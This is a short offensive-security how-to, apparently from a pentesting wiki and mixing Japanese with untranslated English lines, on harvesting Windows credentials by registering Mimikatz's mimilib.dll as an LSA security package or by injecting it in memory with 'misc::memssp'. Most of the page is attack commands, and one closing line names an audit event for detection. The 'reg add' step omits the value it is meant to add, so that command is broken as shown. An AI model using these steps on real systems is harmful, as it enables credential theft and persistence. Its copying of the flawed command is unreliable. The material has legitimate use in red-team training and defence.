Custom SSP

カスタム SSP

SSP（セキュリティサポートプロバイダー）についてはこちらで学んでください。 自分のSSPを作成して、クリアテキストで資格情報をキャプチャできます。

Mimilib

Mimikatzが提供するmimilib.dllバイナリを使用できます。これにより、すべての資格情報がクリアテキストでファイルにログされます。 dllをC:\Windows\System32\に配置します。 既存のLSAセキュリティパッケージのリストを取得します：

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dllをセキュリティサポートプロバイダーリスト（セキュリティパッケージ）に追加します：

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

And after a reboot all credentials can be found in clear text in C:\Windows\System32\kiwissp.log

In memory

You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):

privilege::debug
misc::memssp

これは再起動では持続しません。

緩和策

イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages の監査作成/変更